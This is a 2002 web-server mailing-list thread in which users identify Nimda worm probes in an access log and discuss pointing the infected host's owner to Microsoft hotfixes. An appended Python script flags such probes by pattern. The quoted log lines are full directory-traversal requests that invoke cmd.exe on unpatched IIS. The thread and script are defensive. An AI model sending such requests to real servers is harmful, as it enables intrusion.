Actually I would not recommend supplying the fixes to the offender. Instead I would
recommend they download the hotfix examiner from MS. Utilizing XML, this examiner will
evaluate all the products and required hotfixes and give them a report. There have
been numerous hotfix releases since Nimda first arrived for several products besides
IIS. It would be best to plug all the holes and not just one. If anyone would like, you
can email me off list and I will send anyone asking the hotfix checker and the latest
XML, but I would prefer you to go to MS and download them :)
Danny
On 11/May/2002 10:37:17, Kim A. Currier wrote:
> If anyone needs the file, Dave, I have IIS running, and I have the "Healing"
> file for anyone that needs it. Just email me, it is only a few Kbytes, and
> can be easily emailed.....
>
> Kim
>
> ----- Original Message -----
> From: "Dave Culbertson" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Saturday, May 11, 2002 8:02 AM
> Subject: [sambar] Access log entries {03}
>
>
> > Thanks, Hank, Tony and Alex. I was aware that it was no harm to Sambar and
> > since I don't run IIS, no worries here. However, I have tracked down one of
> > the offending servers and wanted to contact them with informed information.
> > That's why I needed the name of the virus on their server.
> >
> > Dave Culbertson
> >
> > On 11/May/2002 10:51:22, Tony Mallen wrote:
> > > Nimda virus from unpatched Microsoft servers. But it's getting a 404 error so should be okay.
> > >
> > > On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > > > Does anyone recognize what kind of virus or bot would cause the following access log entries?
> > > >
> > > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /scripts/..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET /scripts/..�o../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > >
> > > > I am being accessed by quite a few computers with the same or similar entries and would like to know the name of what this is. Thanks.
> > > >
> > > > Dave Culbertson
> > > >
-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/
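
Added example, not part of the original thread: a small access-log triage script following the observation above that these probes are harmless as long as they return 404. It percent-decodes each request path, flags requests for root.exe/cmd.exe and `..` traversal, groups them by source address, and singles out any probe that did not get a 404. The first three sample lines are copied from the log in the thread; the two 192.0.2.x lines are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common-log-style line as shown in the thread (Sambar adds an extra numeric field).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
SHELL_RE = re.compile(r'/(?:root|cmd)\.exe(?:\?|$)', re.I)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')

# Lines 1-3 are from the thread; lines 4-5 are constructed sample data.
SAMPLE_LOG = '''\
64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
192.0.2.10 - - [04/May/2002:00:46:01 -0400] "GET /index.htm HTTP/1.0" 200 1024 0 "-" "-"
192.0.2.20 - - [04/May/2002:00:47:30 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 812 0 "-" "-"
'''

def classify(path):
    """Return the reasons a request path looks like the probes in the thread."""
    decoded = unquote(path, encoding="latin-1")  # turns %5c / %2f into \ and /
    reasons = []
    if SHELL_RE.search(decoded):
        reasons.append("shell-binary")
    if TRAVERSAL_RE.search(decoded):
        reasons.append("traversal")
    return reasons

def summarize(log_text):
    """Per source IP: probe count, plus any probes that did NOT return 404."""
    report = defaultdict(lambda: {"probes": 0, "non_404": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, _method, path, status = m.groups()
        if classify(path):
            report[ip]["probes"] += 1
            if status != "404":
                report[ip]["non_404"].append((status, path))
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        flag = "INVESTIGATE" if info["non_404"] else "probes only, all 404"
        print(f"{ip}: {info['probes']} probe(s), {flag}")
```

A non-404 status on one of these paths does not by itself prove compromise, but it is the entry to look at first.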